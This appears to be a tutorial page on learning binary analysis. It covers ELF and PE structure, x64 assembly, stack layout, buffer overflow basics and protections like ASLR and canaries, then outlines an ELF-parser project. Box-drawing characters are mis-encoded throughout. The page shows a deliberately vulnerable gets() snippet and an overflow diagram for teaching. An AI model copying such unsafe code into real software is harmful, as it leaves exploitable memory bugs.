← Back to all projects

LEARN BINARY ANALYSIS

Binary analysis is the art of understanding compiled programs without source code. It's the foundation of:

Learn Binary Analysis: From Zero to Reverse Engineering Master

Goal: Deeply understand binary analysisโ€”from file formats and assembly to disassembly, debugging, exploitation, malware analysis, and building your own reverse engineering tools.


Why Learn Binary Analysis?

Binary analysis is the art of understanding compiled programs without source code. Itโ€™s the foundation of:

  • Security Research: Finding vulnerabilities in closed-source software
  • Malware Analysis: Understanding what malicious software does
  • CTF Competitions: Binary exploitation (pwn) challenges
  • Game Hacking/Modding: Reverse engineering game mechanics
  • Software Archaeology: Understanding legacy systems
  • Compiler Development: Seeing how high-level code becomes machine code

After completing these projects, you will:

  • Read and understand x86/x64 assembly fluently
  • Analyze any binary file format (ELF, PE, Mach-O)
  • Use professional tools (Ghidra, IDA, radare2, GDB)
  • Exploit buffer overflows and build ROP chains
  • Analyze malware safely and effectively
  • Build your own disassembler and analysis tools

Core Concept Analysis

The Binary Analysis Landscape

โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚                        SOURCE CODE (if available)                        โ”‚
โ”‚                                                                          โ”‚
โ”‚   int main() {                                                          โ”‚
โ”‚       char buf[64];                                                     โ”‚
โ”‚       gets(buf);        // Vulnerable!                                  โ”‚
โ”‚       return 0;                                                         โ”‚
โ”‚   }                                                                      โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
                                 โ”‚
                                 โ–ผ Compilation
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚                        BINARY EXECUTABLE                                 โ”‚
โ”‚                                                                          โ”‚
โ”‚   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00   .ELF............   โ”‚
โ”‚   03 00 3e 00 01 00 00 00 40 10 00 00 00 00 00 00   ..>.....@.......   โ”‚
โ”‚   ...                                                                    โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
                                 โ”‚
          โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ผโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
          โ–ผ                      โ–ผ                      โ–ผ
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ STATIC ANALYSIS  โ”‚  โ”‚ DYNAMIC ANALYSIS โ”‚  โ”‚   EXPLOITATION   โ”‚
โ”‚                  โ”‚  โ”‚                  โ”‚  โ”‚                  โ”‚
โ”‚ โ€ข Disassembly    โ”‚  โ”‚ โ€ข Debugging      โ”‚  โ”‚ โ€ข Buffer Overflowโ”‚
โ”‚ โ€ข Decompilation  โ”‚  โ”‚ โ€ข Tracing        โ”‚  โ”‚ โ€ข ROP Chains     โ”‚
โ”‚ โ€ข CFG Analysis   โ”‚  โ”‚ โ€ข Instrumentationโ”‚  โ”‚ โ€ข Shellcode      โ”‚
โ”‚ โ€ข String Search  โ”‚  โ”‚ โ€ข Emulation      โ”‚  โ”‚ โ€ข Format Strings โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

Key Concepts Explained

1. Binary File Formats

ELF (Executable and Linkable Format) - Linux/Unix

โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚             ELF Header (64 bytes)        โ”‚
โ”‚  โ€ข Magic: 0x7F 'E' 'L' 'F'               โ”‚
โ”‚  โ€ข Class: 32-bit or 64-bit               โ”‚
โ”‚  โ€ข Entry point address                    โ”‚
โ”‚  โ€ข Program header offset                  โ”‚
โ”‚  โ€ข Section header offset                  โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚         Program Header Table             โ”‚
โ”‚  (Segments - runtime view)               โ”‚
โ”‚  โ€ข PT_LOAD: Loadable segments            โ”‚
โ”‚  โ€ข PT_DYNAMIC: Dynamic linking info      โ”‚
โ”‚  โ€ข PT_INTERP: Interpreter path           โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚              Sections                     โ”‚
โ”‚  .text    - Executable code              โ”‚
โ”‚  .data    - Initialized data             โ”‚
โ”‚  .bss     - Uninitialized data           โ”‚
โ”‚  .rodata  - Read-only data (strings)     โ”‚
โ”‚  .plt     - Procedure Linkage Table      โ”‚
โ”‚  .got     - Global Offset Table          โ”‚
โ”‚  .symtab  - Symbol table                 โ”‚
โ”‚  .strtab  - String table                 โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚         Section Header Table             โ”‚
โ”‚  (Sections - linking view)               โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

PE (Portable Executable) - Windows

โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚           DOS Header                      โ”‚
โ”‚  โ€ข Magic: 'MZ' (0x5A4D)                  โ”‚
โ”‚  โ€ข e_lfanew: Offset to PE header         โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚           DOS Stub                        โ”‚
โ”‚  "This program cannot be run in DOS mode"โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚           PE Signature: "PE\0\0"         โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚           COFF File Header               โ”‚
โ”‚  โ€ข Machine type (x86, x64, ARM)          โ”‚
โ”‚  โ€ข Number of sections                     โ”‚
โ”‚  โ€ข Timestamp                             โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚        Optional Header (PE32/PE32+)      โ”‚
โ”‚  โ€ข Entry point (AddressOfEntryPoint)     โ”‚
โ”‚  โ€ข ImageBase (preferred load address)    โ”‚
โ”‚  โ€ข Data directories (imports, exports)   โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚           Section Headers                 โ”‚
โ”‚  .text   - Code                          โ”‚
โ”‚  .data   - Initialized data              โ”‚
โ”‚  .rdata  - Read-only data, imports       โ”‚
โ”‚  .rsrc   - Resources (icons, dialogs)    โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

2. x86/x64 Assembly Fundamentals

Registers (x64)

General Purpose (64-bit):
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ RAX (accumulator)      โ”‚ Return values, arithmetic          โ”‚
โ”‚ RBX (base)             โ”‚ Callee-saved, general purpose      โ”‚
โ”‚ RCX (counter)          โ”‚ Arg 4, loop counter                โ”‚
โ”‚ RDX (data)             โ”‚ Arg 3, I/O, multiplication         โ”‚
โ”‚ RSI (source index)     โ”‚ Arg 2, string source               โ”‚
โ”‚ RDI (destination)      โ”‚ Arg 1, string destination          โ”‚
โ”‚ RBP (base pointer)     โ”‚ Stack frame base (callee-saved)    โ”‚
โ”‚ RSP (stack pointer)    โ”‚ Current stack top                  โ”‚
โ”‚ R8-R15                 โ”‚ Additional registers (R8-R11 args) โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

Special Registers:
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ RIP (instruction ptr)  โ”‚ Address of next instruction        โ”‚
โ”‚ RFLAGS                 โ”‚ Status flags (ZF, CF, SF, OF)      โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

Register Sizes:
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ 64-bit โ”‚ 32-bit โ”‚ 16-bit โ”‚ 8-bit high โ”‚ 8-bit low โ”‚
โ”‚  RAX   โ”‚  EAX   โ”‚   AX   โ”‚     AH     โ”‚    AL     โ”‚
โ”‚  RBX   โ”‚  EBX   โ”‚   BX   โ”‚     BH     โ”‚    BL     โ”‚
โ”‚  RCX   โ”‚  ECX   โ”‚   CX   โ”‚     CH     โ”‚    CL     โ”‚
โ”‚  RDX   โ”‚  EDX   โ”‚   DX   โ”‚     DH     โ”‚    DL     โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

Calling Conventions

Linux x64 (System V AMD64 ABI):
  Arguments: RDI, RSI, RDX, RCX, R8, R9 (then stack)
  Return:    RAX (and RDX for 128-bit)
  Caller-saved: RAX, RCX, RDX, RSI, RDI, R8-R11
  Callee-saved: RBX, RBP, R12-R15

Windows x64:
  Arguments: RCX, RDX, R8, R9 (then stack, with shadow space)
  Return:    RAX
  Caller-saved: RAX, RCX, RDX, R8-R11
  Callee-saved: RBX, RBP, RDI, RSI, R12-R15

Common Instructions

; Data Movement
mov  rax, rbx       ; rax = rbx
lea  rax, [rbx+8]   ; rax = address of rbx+8 (load effective address)
push rax            ; Push rax onto stack
pop  rax            ; Pop top of stack into rax

; Arithmetic
add  rax, rbx       ; rax = rax + rbx
sub  rax, rbx       ; rax = rax - rbx
imul rax, rbx       ; rax = rax * rbx (signed)
xor  rax, rax       ; rax = 0 (clear register, common idiom)

; Comparison & Jumps
cmp  rax, rbx       ; Compare (sets flags)
test rax, rax       ; AND without storing (sets ZF if rax == 0)
jmp  label          ; Unconditional jump
je   label          ; Jump if equal (ZF=1)
jne  label          ; Jump if not equal (ZF=0)
jl   label          ; Jump if less (signed)
jg   label          ; Jump if greater (signed)

; Function Calls
call func           ; Push return address, jump to func
ret                 ; Pop return address, jump to it

; System Calls (Linux x64)
syscall             ; Invoke kernel (syscall number in RAX)

3. Stack Layout (x64)

High addresses
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚           Previous Stack Frame           โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚              Return Address              โ”‚  โ† Pushed by CALL
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚              Saved RBP                   โ”‚  โ† Pushed by function prologue
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค  โ† RBP points here
โ”‚              Local Variable 1            โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚              Local Variable 2            โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚              Buffer (e.g., char[64])     โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค  โ† RSP points here
โ”‚              (Stack grows down)          โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
Low addresses

Function Prologue:
    push rbp          ; Save old base pointer
    mov  rbp, rsp     ; Set new base pointer
    sub  rsp, N       ; Allocate N bytes for locals

Function Epilogue:
    mov  rsp, rbp     ; Restore stack pointer
    pop  rbp          ; Restore old base pointer
    ret               ; Return to caller

4. Buffer Overflow Basics

Normal execution:
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ Return Addr โ”‚ โ†’ points to caller
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚ Saved RBP   โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚ Buffer[64]  โ”‚ โ† User input goes here
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

After overflow:
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ AAAA...AAAA โ”‚ โ† Overwritten return address!
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค     Now points to attacker code
โ”‚ AAAA...AAAA โ”‚ โ† Overwritten saved RBP
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚ AAAAAAAAAA  โ”‚ โ† Original buffer, filled with 'A's
โ”‚ AAAAAAAAAA  โ”‚
โ”‚ AAAAAAAAAA  โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

5. Static vs Dynamic Analysis

Aspect Static Analysis Dynamic Analysis
Execution No execution Runs the binary
Tools Disassembler, Decompiler Debugger, Tracer
Pros Safe, complete coverage See actual behavior
Cons Canโ€™t see runtime values May miss code paths
Examples Ghidra, IDA, radare2 GDB, strace, ltrace

6. Modern Protections

โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ Protection           โ”‚ What it does                         โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚ ASLR                 โ”‚ Randomize memory layout              โ”‚
โ”‚ Stack Canary         โ”‚ Detect stack buffer overflows        โ”‚
โ”‚ NX/DEP               โ”‚ Non-executable stack/heap            โ”‚
โ”‚ PIE                  โ”‚ Position-independent executable      โ”‚
โ”‚ RELRO                โ”‚ Read-only GOT after relocation       โ”‚
โ”‚ CFI                  โ”‚ Control-flow integrity               โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

Check protections with checksec:
$ checksec --file=./binary
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

Project List

The following 18 projects will teach you binary analysis from fundamentals to advanced techniques.


Project 1: ELF File Parser

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C
  • Alternative Programming Languages: Python, Rust, Go
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 1. The โ€œResume Goldโ€
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Binary Formats / File Parsing
  • Software or Tool: ELF binaries, hex editor
  • Main Book: โ€œPractical Binary Analysisโ€ by Dennis Andriesse

What youโ€™ll build: A command-line tool that parses ELF files and displays all headers, sections, segments, symbols, and relocations in a human-readable formatโ€”like a simplified readelf.

Why it teaches binary analysis: Every reverse engineering task starts with understanding the file format. Building a parser forces you to understand every byte of the ELF structure.

Core challenges youโ€™ll face:

  • Parsing the ELF header โ†’ maps to understanding magic bytes, class (32/64-bit), endianness
  • Reading program headers โ†’ maps to segments, what gets loaded into memory
  • Reading section headers โ†’ maps to sections, symbols, strings
  • Handling different architectures โ†’ maps to x86, ARM, MIPS variations

Resources for key challenges:

  • Linux Audit - ELF Binaries - Excellent overview
  • โ€œPractical Binary Analysisโ€ Chapter 2 - Comprehensive ELF explanation
  • man elf - The ELF specification

Key Concepts:

  • ELF Header Structure: โ€œPractical Binary Analysisโ€ Ch. 2 - Andriesse
  • Program vs Section Headers: elf(5) man page
  • Symbol Tables: โ€œLearning ELFโ€ - Can Ozkan (Medium)

Difficulty: Intermediate Time estimate: 1-2 weeks Prerequisites: C programming, understanding of pointers and structs, familiarity with hexadecimal

Real world outcome:

$ ./elf_parser /bin/ls
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:   ELF64
  Data:    2's complement, little endian
  Version: 1 (current)
  OS/ABI:  UNIX - System V
  Type:    DYN (Shared object file)
  Machine: AMD x86-64
  Entry:   0x6b10

Program Headers:
  Type           Offset   VirtAddr         FileSiz  MemSiz   Flg
  PHDR           0x000040 0x0000000000000040 0x0002d8 0x0002d8 R
  INTERP         0x000318 0x0000000000000318 0x00001c 0x00001c R
  LOAD           0x000000 0x0000000000000000 0x003510 0x003510 R
  ...

Sections:
  [Nr] Name              Type       Address          Size
  [ 0]                   NULL       0x0000000000000000 0x0
  [ 1] .interp           PROGBITS   0x0000000000000318 0x1c
  [ 2] .note.gnu.build-id NOTE      0x0000000000000338 0x24
  ...

Symbols:
  Num:    Value          Size Type    Bind   Name
    1: 0000000000000000     0 FUNC    GLOBAL printf@GLIBC_2.2.5
    2: 0000000000006b10   123 FUNC    GLOBAL main
  ...

Implementation Hints:

Start by mapping the ELF header structure:

// Don't write code, but understand this structure:
// Elf64_Ehdr contains:
//   e_ident[16]  - Magic number and other info
//   e_type       - Object file type (ET_EXEC, ET_DYN, etc.)
//   e_machine    - Architecture (EM_X86_64, EM_ARM, etc.)
//   e_entry      - Entry point virtual address
//   e_phoff      - Program header table file offset
//   e_shoff      - Section header table file offset
//   e_phnum      - Number of program headers
//   e_shnum      - Number of section headers

Questions to guide your implementation:

  1. How do you detect if a file is 32-bit or 64-bit ELF?
  2. How do you find the string table section to get section names?
  3. Whatโ€™s the difference between .dynsym and .symtab?
  4. How do program headers map sections to memory segments?

Learning milestones:

  1. Parse ELF header correctly โ†’ Understand file identification
  2. Iterate program headers โ†’ Understand runtime memory layout
  3. Iterate section headers โ†’ Understand linking and symbols
  4. Resolve symbol names โ†’ Understand string tables

The Core Question Youโ€™re Answering

How does the operating system transform a static file on disk into a running process in memory, and what information does it need from the binary format to make this transformation?

This question drives everything in binary analysis. The ELF format exists to bridge the gap between storage and executionโ€”understanding it means understanding how programs come to life.

Concepts You Must Understand First

1. Binary File Formats vs. In-Memory Representations

